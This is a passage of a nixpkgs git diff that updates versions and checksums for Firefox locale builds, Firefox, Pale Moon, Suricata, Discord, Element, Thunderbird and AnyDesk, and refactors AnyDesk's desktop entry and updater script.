"b46aabecf664d093a1928f6004d21dc81b2ffc195926652f6af276661900abd4"; + sha256 = "1d4075ee01d742d9d846a9cce63847baf5ad749d260e7d2018391719e3478200"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ms/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ms/firefox-125.0.3.tar.bz2"; locale = "ms"; arch = "linux-i686"; - sha256 = "22efdbdc9ea35b8d9fe3f26f08a971361c4931abec59758f077a6d12e6f6f4fa"; + sha256 = "aa9012aa1dab8a1da2b4d21743fb01e2cae1322873cd67113f0d3298cc7b62e6"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/my/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/my/firefox-125.0.3.tar.bz2"; locale = "my"; arch = "linux-i686"; - sha256 = "c4577d22565386ce731612103ee797d8a01df494cab95442d412cb2163a012ca"; + sha256 = "a52f0bddf09a9381616ee91246a2bbf02112bbe7d8e651a75bf71bb4ff0a55ff"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/nb-NO/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/nb-NO/firefox-125.0.3.tar.bz2"; locale = "nb-NO"; arch = "linux-i686"; - sha256 = "dfe7b1164522e0d16444efec1f59269fef971d0362cbfe9f612f7fa5cad7c88f"; + sha256 = "9c221603c7cbe51e53e03bceb2bfa64b51bda3935f8d59f995270297dfe435b5"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ne-NP/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ne-NP/firefox-125.0.3.tar.bz2"; locale = "ne-NP"; arch = "linux-i686"; - sha256 = "6686fdc0c953696a0d33dd52d30ade52bd8c9eb3f0ece2c2c0c05aacba0e5e6b"; + sha256 = "026fa9b87a1fb8cfc347aee7edd09cf07433d2febb6bc7284c90942aeea886cb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/nl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/nl/firefox-125.0.3.tar.bz2"; locale = "nl"; arch = "linux-i686"; - sha256 = "122d6f234ae9b8459117e64658ca322e98d19a2c52df92d6152baf9b36aea82a"; + sha256 = "5454546bf2eea2e8785ec994302e9d8d9f3468a89cc5be1eaf491132f8449deb"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/nn-NO/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/nn-NO/firefox-125.0.3.tar.bz2"; locale = "nn-NO"; arch = "linux-i686"; - sha256 = "d1db5f3b8433275b521e3f51afdd62180ae255446f199bd5a474a59a30fa432c"; + sha256 = "a71e340f55985cf76a5e768ee63c5d9fe5f5a68334642f34062324211cc48b2d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/oc/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/oc/firefox-125.0.3.tar.bz2"; locale = "oc"; arch = "linux-i686"; - sha256 = "9175fb84d455f5f3b31d3dc646451644c12df19f930420e7e408e89ed86e595c"; + sha256 = "441a44314d02b9e54e86b0fa1b8049ceaad7bab7b66e54c0a841f8d624ce76aa"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/pa-IN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/pa-IN/firefox-125.0.3.tar.bz2"; locale = "pa-IN"; arch = "linux-i686"; - sha256 = "bdf66cc8ecd0f924f0dafba2e242f696fe9be86a7e69d67d44aba4e4868da951"; + sha256 = "b72d31b37d4f6d7798e96c6685512814c991a987253767aad79cf515012b057f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/pl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/pl/firefox-125.0.3.tar.bz2"; locale = "pl"; arch = "linux-i686"; - sha256 = "3595e0cc555c55f28f5bec95959517ac6687421319aeb549c15bf50faa38b43d"; + sha256 = "1ae017de12a7faf49b06c9c4bab7e20e776e5fad1430fb0e7f9af519739659cc"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/pt-BR/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/pt-BR/firefox-125.0.3.tar.bz2"; locale = "pt-BR"; arch = "linux-i686"; - sha256 = "bf5ea226f5bf1c4113ef0d6885a1b74af83f38591972ee4d2c6d1063869a934d"; + sha256 = "6a5f5afb1b3e4f71dffa20ed5ebd3037b63bf127cf9daf09291bf62d9e8a093d"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/pt-PT/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/pt-PT/firefox-125.0.3.tar.bz2"; locale = "pt-PT"; arch = "linux-i686"; - sha256 = "54e2d124625715c63c224b8914f53a1e06052ad7bd9c06acaaaa0b61a996f018"; + sha256 = "64763768287dd897705be573e01a61c06c916bd413f8d6a1fd47a64f0d918c09"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/rm/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/rm/firefox-125.0.3.tar.bz2"; locale = "rm"; arch = "linux-i686"; - sha256 = "24371d9664b00363d02e3881b89e86732f53e9bd989b5fca2a2a70c9d998b836"; + sha256 = "4ef4a5c3180e3432f7b9380deb84df9f816eaf4ca333c93cfce8e0a52a1cd39b"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ro/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ro/firefox-125.0.3.tar.bz2"; locale = "ro"; arch = "linux-i686"; - sha256 = "7a47f911a297375cd3bcf407f876c56c6cb88ca5020d218cf4077c780c1732e7"; + sha256 = "a89a97ae37721ea57f0e087c430dea88ffdb43b1a4b823cd9fff6e40faa46d81"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ru/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ru/firefox-125.0.3.tar.bz2"; locale = "ru"; arch = "linux-i686"; - sha256 = "fc5ad6b89224b862b586692bf3536205786c90230c595cda8e8b37c64839aa27"; + sha256 = "93dfb081232b4af62d9cd4826501832dcd90f1a91dbafa9efa5be2a094eb2df7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sat/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sat/firefox-125.0.3.tar.bz2"; locale = "sat"; arch = "linux-i686"; - sha256 = "bbfd0aaee2266aae2a0b30f2b35770eb2fb51e46dba75d737aadbb31da243d39"; + sha256 = "33292fec9a1ac64f7e0b18758de38af19a19d9dbc437e8fce7f8fa20bf58da98"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sc/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sc/firefox-125.0.3.tar.bz2"; locale = "sc"; arch = "linux-i686"; - sha256 = "c09414e2609fbbe64157c2ed19a8f4b079a35847a4b418d84451a813b5b8dd63"; + sha256 = "368600cf67e645dc9eed1835ead1eeebda974b1fc2ff5ca8ce3a65047da402f5"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sco/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sco/firefox-125.0.3.tar.bz2"; locale = "sco"; arch = "linux-i686"; - sha256 = "c2a8ba393c85956e7e9b4f778b7a6d15bb6ccfd3784e3e0f25d8ab0cbea53dec"; + sha256 = "20db2d38c151893b43727af5016b7f48684aeac4e66386a99cdb7f640678970f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/si/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/si/firefox-125.0.3.tar.bz2"; locale = "si"; arch = "linux-i686"; - sha256 = "431670b3f074ad1cfb91033cd115b7d7dc0145a138fa7ec258afa8ea9de8759a"; + sha256 = "56f3baecb795a6f99f52ac4749d9b7e69222f43a847fa5e26363a656fdfad8e0"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sk/firefox-125.0.3.tar.bz2"; locale = "sk"; arch = "linux-i686"; - sha256 = "0022b74c8688325113aff06ddcad2a008195c093a86b26c0344a6c5377a990f9"; + sha256 = "7c7c25a7426b1f3b98d5aa86433237bb4e7d9f4d4c74d3302966783985a6a067"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sl/firefox-125.0.3.tar.bz2"; locale = "sl"; arch = "linux-i686"; - sha256 = "ee6eb7ece377119e362c2ffc85ea6ac9f7a03ded3ae44b148f73e708600ccf40"; + sha256 = "43d59e1d98e772336eafd0a2d9eeb5ddb17ffe2e21b41ec8501d5f92d01e33bf"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/son/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/son/firefox-125.0.3.tar.bz2"; locale = "son"; arch = "linux-i686"; - sha256 = "17075b61d96ce5bf6e9d5131c00c4cee84a3bf97e81a0672ca292c8c24318006"; + sha256 = "561fb6ac615a92d24229f33be1bec0c40c593eb46bdd8c5b0f916ce72c7ae0c7"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sq/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sq/firefox-125.0.3.tar.bz2"; locale = "sq"; arch = "linux-i686"; - sha256 = "758b50ad050464f67afe3615826b2e8c36ef852f911abb3f85dba198b452e9f9"; + sha256 = "b58d25f1a89ffda900b77bda85b8a0b4013009d07756f1e80c2f464b4f00e9dc"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sr/firefox-125.0.3.tar.bz2"; locale = "sr"; arch = "linux-i686"; - sha256 = "b63320cdac54d79d9c192df4732f63795718bd72a8d69a7b08d03a444d913d44"; + sha256 = "6efb25e0762457b7738ce878830a236543d8ac3e27eb26fd92038f83031980ad"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/sv-SE/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/sv-SE/firefox-125.0.3.tar.bz2"; locale = "sv-SE"; arch = "linux-i686"; - sha256 = "bfc3854d763a26231884c31e938ab699fc267eaada2fba59825ae4978addb6ea"; + sha256 = "01e408103e812278d0c81b3acef7045636d64999237dfeb74024e63f640084aa"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/szl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/szl/firefox-125.0.3.tar.bz2"; locale = "szl"; arch = "linux-i686"; - sha256 = "59142a86da4d79a9045e3402f5dc08ad1bb4fd0da19c38678e23ec28fe0d17e9"; + sha256 = "940138fe1ec2f707f153147db6b6e5eca9dce191ae8765a52662cc89d9e18fe1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ta/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ta/firefox-125.0.3.tar.bz2"; locale = "ta"; arch = "linux-i686"; - sha256 = "10f81b53ab382c3d886cccdcbc358d88913047c2d3b46f3b5ede8e6e37e49f4b"; + sha256 = "d90039aef7fc7e56e948d4af079f3edef5b65588ad5fd650cb70f59188c758fd"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/te/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/te/firefox-125.0.3.tar.bz2"; locale = "te"; arch = "linux-i686"; - sha256 = "cfc670b083d0833f12009fb7a5900005b587f8810703fe1524eff4a8d7324924"; + sha256 = "1ad8d8e42c691566cf1d082464f5c32e8ecef628182ff4dbebb4482e2eb33465"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/tg/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/tg/firefox-125.0.3.tar.bz2"; locale = "tg"; arch = "linux-i686"; - sha256 = "85639be530c9646f3585da1e016baaa5da94ea5f013fb000e9701f24ef0f1a6f"; + sha256 = "4c6974fcdc6d55662073b259b4891472eae22f79aa718ba6f13e73e54f97ca42"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/th/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/th/firefox-125.0.3.tar.bz2"; locale = "th"; arch = "linux-i686"; - sha256 = "fad792259e305d54f79a96cb7531a1715e005550a38f1270c8c7c87bfafde1f6"; + sha256 = "6725c41f5465bf1a1731154654bd6e0a8aa9b5175e1e7f64ae719e8b1fed0057"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/tl/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/tl/firefox-125.0.3.tar.bz2"; locale = "tl"; arch = "linux-i686"; - sha256 = "3e99c9479f4b3cf56b50c42b8795a6b33fbbc691fa590a37154e7cce060e4a86"; + sha256 = "6e7dee9256a30aec0c7fa67cff5d3b295bd45f417a0d02f34cdafd2fabffa6b1"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/tr/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/tr/firefox-125.0.3.tar.bz2"; locale = "tr"; arch = "linux-i686"; - sha256 = "ed87d470ba9002b8dad1602903a7e09ffbfc060f07a18c0add678b598734c375"; + sha256 = "fc1f91da8f5b30301a0f3238b6dde5e0accd314f6fe43d18715b786a2917d8e6"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/trs/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/trs/firefox-125.0.3.tar.bz2"; locale = "trs"; arch = "linux-i686"; - sha256 = "06828e917ef4af7d21e9f029089786c83e8fd68566791fe7e4c3864e86c3e6f5"; + sha256 = "ab8cf88696df73b802f6dd6f42c33172c35685af462e92e2fd161ed3307c5fae"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/uk/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/uk/firefox-125.0.3.tar.bz2"; locale = "uk"; arch = "linux-i686"; - sha256 = "b25acede364fe39902fa28246598f98f84a7dc3165360aa9c64cf1561fa15ef6"; + sha256 = "40fd34bcbef5937190065db1769227ae05fe29d7df65cab96b4b47b68acfd0f2"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/ur/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/ur/firefox-125.0.3.tar.bz2"; locale = "ur"; arch = "linux-i686"; - sha256 = "a4cea15d11709f4d6dcbded2dc4148a0fb898714ccc25a04cbcbbcd95ee71cc5"; + sha256 = "360c8abcfc50fa78f1115973f152785ee52f1ab9a8e512183df7e7f6f9099ae9"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/uz/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/uz/firefox-125.0.3.tar.bz2"; locale = "uz"; arch = "linux-i686"; - sha256 = "0391b07c6610249fdb6b9d97f7740be9eef58e17839226aec92824288c470f27"; + sha256 = "ac301677aa02e5e8f4ebbf382b511b9a7ee07036e7f74726ec23dfae2b82614f"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/vi/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/vi/firefox-125.0.3.tar.bz2"; locale = "vi"; arch = "linux-i686"; - sha256 = "a5ae2a1f2742cccddee2b5f38410420c70819bc50690036f70751cd167652148"; + sha256 = "78964ade29f3d8c3d664be9a634ab6f2e7c33100d08936de4b813b7718946d39"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/xh/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/xh/firefox-125.0.3.tar.bz2"; locale = "xh"; arch = "linux-i686"; - sha256 = "ecfb3185448cb3f41dc1cf0ac21cdb44bfb01c26a84630376090749c8148af5a"; + sha256 = "3692b2d980105d1d1640c0dfaec52df29cc5c5b3868250aee6c011d9e3a95963"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/zh-CN/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/zh-CN/firefox-125.0.3.tar.bz2"; locale = "zh-CN"; arch = "linux-i686"; - sha256 = "4b4fdcf285ac82083c4b1ca18d91884bceaf9fdbf407266a6aade2ecf7f3c6ba"; + sha256 = "b9c137726f279abef9f86e8f2889465d1f9f2bfd34cb7008471a5c7e5222fd78"; } - { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.2/linux-i686/zh-TW/firefox-125.0.2.tar.bz2"; + { url = "https://archive.mozilla.org/pub/firefox/releases/125.0.3/linux-i686/zh-TW/firefox-125.0.3.tar.bz2"; locale = "zh-TW"; arch = "linux-i686"; - sha256 = "8f3be757fb5212e849a31a98f7b1ec874a19d14e8d9af186d36c070759005e23"; + sha256 = "a7cd7f510e92be7608a405ee7048becf1e2866dc0153434e465fa3f381921ad1"; } ]; } diff --git a/pkgs/applications/networking/browsers/firefox/packages.nix b/pkgs/applications/networking/browsers/firefox/packages.nix index 88fdbbbb1027e..8443b8ad768f7 100644 --- a/pkgs/applications/networking/browsers/firefox/packages.nix +++ b/pkgs/applications/networking/browsers/firefox/packages.nix @@ -3,10 +3,10 @@ { firefox = buildMozillaMach rec { pname = "firefox"; - version = "125.0.2"; + version = "125.0.3"; src = fetchurl { url = "mirror://mozilla/firefox/releases/${version}/source/firefox-${version}.source.tar.xz"; - sha512 = "f6d5fff7c5c532d2e41a246d0403bdd746981cfcb7c43f9d3d8ec85a7acc3310a52043d1e18848475cef1b63c24769e81b2b06d68ae007b68016ee51436032f1"; + sha512 = "18e705a3093290311ccb5f27f01e43fe243ece94c1769a9ccc4fa53d370e32a1ec6a107cdeb531e9468b9aca1a1fe668161adb7acc1ec65fd383837882c7d484"; }; extraPatches = [ diff --git a/pkgs/applications/networking/browsers/palemoon/bin.nix b/pkgs/applications/networking/browsers/palemoon/bin.nix index 5143b1746ca38..3ffc1df51ac1c 100644 --- a/pkgs/applications/networking/browsers/palemoon/bin.nix +++ b/pkgs/applications/networking/browsers/palemoon/bin.nix @@ -20,7 +20,7 @@ stdenv.mkDerivation (finalAttrs: { pname = "palemoon-bin"; - version = "33.0.2"; + version = "33.1.0"; src = finalAttrs.passthru.sources."gtk${if withGTK3 then "3" else "2"}"; @@ -158,11 +158,11 @@ stdenv.mkDerivation (finalAttrs: { in { gtk3 = fetchzip { urls = urlRegionVariants "gtk3"; - hash = "sha256-Kahnwlj9PIWB24lvH6h9cZK459NW2Vo2g6ckuv0Ax48="; + hash = "sha256-qjztSvNL7KNFG3sszgk5qH77do0HFQ8YTrgjFi2ZM00="; }; gtk2 = fetchzip { urls = urlRegionVariants "gtk2"; - hash = "sha256-XOiLGmU8O96clUpnp/OkzXmWR1PJ2AdzbVFj6adbcvY="; + hash = "sha256-q4zAmnCN9SHGb8PthjAx7d5FKq/oAQ8c0R+U1SWqjAA="; }; }; diff --git a/pkgs/applications/networking/ids/suricata/default.nix b/pkgs/applications/networking/ids/suricata/default.nix index 1ea7541495545..efa946606c3e2 100644 --- a/pkgs/applications/networking/ids/suricata/default.nix +++ b/pkgs/applications/networking/ids/suricata/default.nix @@ -33,11 +33,11 @@ in stdenv.mkDerivation rec { pname = "suricata"; - version = "7.0.3"; + version = "7.0.4"; src = fetchurl { url = "https://www.openinfosecfoundation.org/download/${pname}-${version}.tar.gz"; - hash = "sha256-6gdC16mHg/GvSldmGvYGi8LYUKw+ygSzIE0ozhZeNf8="; + hash = "sha256-ZABgEgAkvnDb6B9uxu/HLkYlD8s2IZ3/Z+ZBciD/Ibc="; }; nativeBuildInputs = [ diff --git a/pkgs/applications/networking/instant-messengers/discord/default.nix b/pkgs/applications/networking/instant-messengers/discord/default.nix index 6db934cc7a4c1..6abe9c54417a7 100644 --- a/pkgs/applications/networking/instant-messengers/discord/default.nix +++ b/pkgs/applications/networking/instant-messengers/discord/default.nix @@ -2,14 +2,14 @@ let versions = if stdenv.isLinux then { - stable = "0.0.50"; - ptb = "0.0.80"; - canary = "0.0.357"; + stable = "0.0.51"; + ptb = "0.0.81"; + canary = "0.0.369"; development = "0.0.17"; } else { - stable = "0.0.301"; - ptb = "0.0.109"; - canary = "0.0.477"; + stable = "0.0.302"; + ptb = "0.0.110"; + canary = "0.0.486"; development = "0.0.39"; }; version = versions.${branch}; @@ -17,15 +17,15 @@ let x86_64-linux = { stable = fetchurl { url = "https://dl.discordapp.net/apps/linux/${version}/discord-${version}.tar.gz"; - hash = "sha256-6VXdVLk7Z8NGQMiSdgBRd8NIueUktkId6BXYKNABb+4="; + hash = "sha256-w8zLeaqJXdbI67X/UDxSLQxZei5eraa/BkMZa+GDpYk="; }; ptb = fetchurl { url = "https://dl-ptb.discordapp.net/apps/linux/${version}/discord-ptb-${version}.tar.gz"; - hash = "sha256-y/ntnHIYcY35Jszh0PrFy395eJ5dBWwLNpzHMoSZuNA="; + hash = "sha256-/kM23y4Hx/0HwIOQvd+4Y429s/6Q+coa27hgI2U3EcU="; }; canary = fetchurl { url = "https://dl-canary.discordapp.net/apps/linux/${version}/discord-canary-${version}.tar.gz"; - hash = "sha256-sDwC5kPzAfvQmsrq6M/GPFtUaT9pNAEB4uGI5Mn3oXs="; + hash = "sha256-Ohfp5ypvdmjr5rYR1usdVoEuVwOALRozysIjT/v75Qs="; }; development = fetchurl { url = "https://dl-development.discordapp.net/apps/linux/${version}/discord-development-${version}.tar.gz"; @@ -35,15 +35,15 @@ let x86_64-darwin = { stable = fetchurl { url = "https://dl.discordapp.net/apps/osx/${version}/Discord.dmg"; - hash = "sha256-h7C1wCKtUGcMFUhoKVdD7Vq9TGUaXfmjlVhwmRdhqYw="; + hash = "sha256-Xt0ef+ogGlPA4ebxuAsGQKeMVDoTB58jCRcyM1fHjYE="; }; ptb = fetchurl { url = "https://dl-ptb.discordapp.net/apps/osx/${version}/DiscordPTB.dmg"; - hash = "sha256-xxLnzELuI0X2r/weP1K2Bb51uRh1JjR72p7cXzy12Kc="; + hash = "sha256-hkRO/4YD1j4gsp+r3+md3ND/xtNmdutJiXlY3UIecIY="; }; canary = fetchurl { url = "https://dl-canary.discordapp.net/apps/osx/${version}/DiscordCanary.dmg"; - hash = "sha256-xEDtEtZNhOTtz+zRLLQBSeLbntlVAVQsocAGyAaVePM="; + hash = "sha256-c7KNWsV+pultD+HqRNonSOW9PCGx1AajCfnc94Dokwc="; }; development = fetchurl { url = "https://dl-development.discordapp.net/apps/osx/${version}/DiscordDevelopment.dmg"; diff --git a/pkgs/applications/networking/instant-messengers/element/pin.nix b/pkgs/applications/networking/instant-messengers/element/pin.nix index b7c9de0cc7323..516c1182e22f5 100644 --- a/pkgs/applications/networking/instant-messengers/element/pin.nix +++ b/pkgs/applications/networking/instant-messengers/element/pin.nix @@ -1,9 +1,9 @@ { - "version" = "1.11.64"; + "version" = "1.11.65"; "hashes" = { - "desktopSrcHash" = "sha256-U6vVuc7claPZI4idZmTXpm1GHm+VrmoaJNVgJU0GHMU="; - "desktopYarnHash" = "079jg178cq2m91fhzrdab8x33wrm5a97ga19g0268q118vbnv98l"; - "webSrcHash" = "sha256-jphxYlSxHjck6XA3JXofC6AbVb+aVOjsbxLUqo1hRhY="; - "webYarnHash" = "0q91llgx8cy6zxinfqbnrcfkmclqx7czlp08f1ls43x0w2vd8447"; + "desktopSrcHash" = "sha256-aRlTM8j+lMB97QsmRlcvSZqLJ/2vmQIz1viTIoycmYA="; + "desktopYarnHash" = "08scs091k0i6lwfpw0id4jxmmdix0jxvnm9fyjwzrsrzh6q6899y"; + "webSrcHash" = "sha256-aE7pmqLOa9aCaSaSOpX2NqcY0OKBjL5mZbKModbKxZg="; + "webYarnHash" = "1b9q8v5jz6w2vvfkgq8nzajzs798ja2ff3wjv6d5m7sri8il7f0s"; }; } diff --git a/pkgs/applications/networking/mailreaders/thunderbird/packages.nix b/pkgs/applications/networking/mailreaders/thunderbird/packages.nix index 956842ca9bccd..5a55476d4b9e4 100644 --- a/pkgs/applications/networking/mailreaders/thunderbird/packages.nix +++ b/pkgs/applications/networking/mailreaders/thunderbird/packages.nix @@ -44,13 +44,13 @@ rec { thunderbird-115 = (buildMozillaMach rec { pname = "thunderbird"; - version = "115.9.0"; + version = "115.10.1"; application = "comm/mail"; applicationName = "Mozilla Thunderbird"; binaryName = pname; src = fetchurl { url = "mirror://mozilla/thunderbird/releases/${version}/source/thunderbird-${version}.source.tar.xz"; - sha512 = "8ff0bed6e6d7f337ebae09011a10b59343ae7a8355ed1da2d72ec0d4218010adfae78e42565e5b784df26cef4702f313dc9616ac5ca5530fb772d77bdf7f2ea4"; + sha512 = "0324811d3e7e6228bb45cbf01e8a4a08b8386e22d1b52eb79f9a9a3bda940eb9d534ec1230961e9a998a0162c299a1ad49d23c5fbfa8e287896bcc0fd1c398e0"; }; extraPatches = [ # The file to be patched is different from firefox's `no-buildconfig-ffx90.patch`. diff --git a/pkgs/applications/networking/remote/anydesk/default.nix b/pkgs/applications/networking/remote/anydesk/default.nix index 66b8f8d59bd8d..5053de0ecb352 100644 --- a/pkgs/applications/networking/remote/anydesk/default.nix +++ b/pkgs/applications/networking/remote/anydesk/default.nix @@ -1,42 +1,20 @@ { lib, stdenv, fetchurl, makeWrapper, makeDesktopItem, genericUpdater, writeShellScript , atk, cairo, gdk-pixbuf, glib, gnome2, gtk2, libGLU, libGL, pango, xorg, minizip -, lsb-release, freetype, fontconfig, polkit, polkit_gnome, pciutils +, lsb-release, freetype, fontconfig, polkit, polkit_gnome, pciutils, copyDesktopItems , pulseaudio }: let description = "Desktop sharing application, providing remote support and online meetings"; - - desktopItem = makeDesktopItem { - name = "AnyDesk"; - exec = "@out@/bin/anydesk %u"; - icon = "anydesk"; - desktopName = "AnyDesk"; - genericName = description; - categories = [ "Network" ]; - startupNotify = false; - }; - in stdenv.mkDerivation rec { pname = "anydesk"; - version = "6.3.0"; + version = "6.3.2"; src = fetchurl { urls = [ - "https://download.anydesk.com/linux/${pname}-${version}-amd64.tar.gz" - "https://download.anydesk.com/linux/generic-linux/${pname}-${version}-amd64.tar.gz" + "https://download.anydesk.com/linux/anydesk-${version}-amd64.tar.gz" + "https://download.anydesk.com/linux/generic-linux/anydesk-${version}-amd64.tar.gz" ]; - hash = "sha256-seMzfTXOGa+TljgpmIsgFOis+79r0bWt+4vH3Nb+5FI="; - }; - - passthru = { - updateScript = genericUpdater { - versionLister = writeShellScript "anydesk-versionLister" '' - curl -s https://anydesk.com/en/downloads/linux \ - | grep "https://[a-z0-9._/-]*-amd64.tar.gz" -o \ - | uniq \ - | sed 's,.*/anydesk-\(.*\)-amd64.tar.gz,\1,g' - ''; - }; + hash = "sha256-nSY4qHRsEvQk4M3JDHalAk3C6Y21WlfDQ2Gpp6/jjMs="; }; buildInputs = [ @@ -48,7 +26,19 @@ in stdenv.mkDerivation rec { libXrandr libXtst libXt libICE libSM libXrender ]); - nativeBuildInputs = [ makeWrapper ]; + nativeBuildInputs = [ copyDesktopItems makeWrapper ]; + + desktopItems = [ + (makeDesktopItem { + name = "AnyDesk"; + exec = "anydesk %u"; + icon = "anydesk"; + desktopName = "AnyDesk"; + genericName = description; + categories = [ "Network" ]; + startupNotify = false; + }) + ]; installPhase = '' runHook preInstall @@ -57,7 +47,6 @@ in stdenv.mkDerivation rec { install -m755 anydesk $out/bin/anydesk cp copyright README $out/share/doc/anydesk cp -r icons/hicolor/* $out/share/icons/hicolor/ - cp ${desktopItem}/share/applications/*.desktop $out/share/applications runHook postInstall ''; @@ -75,11 +64,19 @@ in stdenv.mkDerivation rec { wrapProgram 